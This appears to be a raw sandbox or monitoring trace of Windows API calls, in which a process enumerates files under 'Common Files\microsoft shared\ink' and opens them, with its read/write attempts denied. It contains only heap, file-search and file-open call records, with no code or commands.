1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0082.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0082.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0082.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0082.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0082.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0082.071] AreFileApisANSI () returned 1 [0082.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG", lpUsedDefaultChar=0x0) returned 57 [0082.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0082.071] AreFileApisANSI () returned 1 [0082.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG") returned 57 [0082.071] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.071] GetLastError () returned 0x5 [0082.071] GetLastError () returned 0x5 [0082.071] SetLastError (dwErrCode=0x5) [0082.071] GetLastError () returned 0x5 [0082.071] SetLastError (dwErrCode=0x5) [0082.071] GetLastError () returned 0x5 [0082.071] SetLastError (dwErrCode=0x5) [0082.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.072] AreFileApisANSI () returned 1 [0082.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG") returned 57 [0082.072] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.072] GetLastError () returned 0x5 [0082.072] GetLastError () returned 0x5 [0082.072] SetLastError (dwErrCode=0x5) [0082.072] GetLastError () returned 0x5 [0082.072] SetLastError (dwErrCode=0x5) [0082.072] GetLastError () returned 0x5 [0082.072] SetLastError (dwErrCode=0x5) [0082.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.072] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0082.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0082.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0082.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0082.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0082.072] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0082.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.073] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78690 [0082.073] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.073] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0082.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0082.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.074] AreFileApisANSI () returned 1 [0082.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0082.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.074] AreFileApisANSI () returned 1 [0082.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x856c0 [0082.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 73 [0082.074] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.075] GetFileType (hFile=0x430) returned 0x1 [0082.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0082.075] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.075] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.075] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.075] CloseHandle (hObject=0x430) returned 1 [0082.075] AreFileApisANSI () returned 1 [0082.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85080 [0082.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui") returned 73 [0082.076] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.076] GetLastError () returned 0x5 [0082.076] GetLastError () returned 0x5 [0082.076] SetLastError (dwErrCode=0x5) [0082.076] GetLastError () returned 0x5 [0082.076] SetLastError (dwErrCode=0x5) [0082.076] GetLastError () returned 0x5 [0082.076] SetLastError (dwErrCode=0x5) [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0082.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.076] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0082.076] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0082.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0082.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0082.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0082.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0082.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.077] AreFileApisANSI () returned 1 [0082.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml", lpUsedDefaultChar=0x0) returned 63 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.077] AreFileApisANSI () returned 1 [0082.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0082.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e140 [0082.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 63 [0082.078] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0082.078] GetFileType (hFile=0x42c) returned 0x1 [0082.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0082.079] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.079] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.079] SetFilePointerEx 